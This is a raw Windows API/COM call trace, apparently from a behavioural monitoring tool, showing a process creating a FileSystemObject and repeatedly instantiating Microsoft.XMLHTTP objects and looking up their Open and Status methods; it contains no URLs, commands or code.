	[0392.808] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0392.808] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0392.808] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0392.808] SysStringLen (param_1=0x0) returned 0x0
	[0392.808] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0392.811] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0392.811] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0392.811] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0392.811] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0392.811] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0392.811] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0393.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0393.297] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0393.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0393.299] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0393.299] SysStringLen (param_1=0x0) returned 0x0
	[0393.299] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0393.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0393.299] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0393.299] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0393.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0393.299] ??2@YAPEAX_K@Z () returned 0x62f330
	[0393.299] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0393.299] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0393.299] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0393.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0393.299] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0393.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0393.299] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0393.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0393.301] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0393.301] SysStringLen (param_1=0x0) returned 0x0
	[0393.302] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0393.302] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0393.302] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0393.302] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0393.302] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0393.302] ??2@YAPEAX_K@Z () returned 0x62f310
	[0393.302] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0393.302] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0393.302] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0393.302] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0393.302] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0393.302] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0393.302] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0393.302] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0393.302] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0393.302] SysStringLen (param_1=0x0) returned 0x0
	[0393.302] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0393.303] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0393.303] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0393.303] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0393.303] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7488) returned 0x0
	[0393.303] ??2@YAPEAX_K@Z () returned 0x62f330
	[0393.303] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7488, pUnkSite=0x62f330) 
	[0393.303] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0393.303] XMLHTTPRequest:IUnknown:Release (This=0x49c7488) returned 0x0
	[0393.303] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0393.303] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0393.303] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0393.303] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0393.303] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0393.303] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0393.303] SysStringLen (param_1=0x0) returned 0x0
	[0393.303] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0393.303] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0393.303] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7530) returned 0x0
	[0393.303] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0393.303] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0393.303] ??2@YAPEAX_K@Z () returned 0x62f310
	[0393.303] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0393.303] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0393.304] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0393.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7530) returned 0x0
	[0393.304] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7530) returned 0x3
	[0393.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0393.304] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0393.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0393.304] longjmp () 
	[0393.304] longjmp () 
	[0393.304] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0393.304] SysStringLen (param_1=0x0) returned 0x0
	[0393.304] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0393.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0393.304] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0393.304] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0393.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0393.304] ??2@YAPEAX_K@Z () returned 0x62f330
	[0393.304] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0393.304] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0393.304] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0393.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0393.305] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0393.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0393.305] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0393.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0393.305] longjmp () 
	[0393.305] longjmp () 
	[0393.305] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0393.305] SysStringLen (param_1=0x0) returned 0x0
	[0393.305] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0393.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
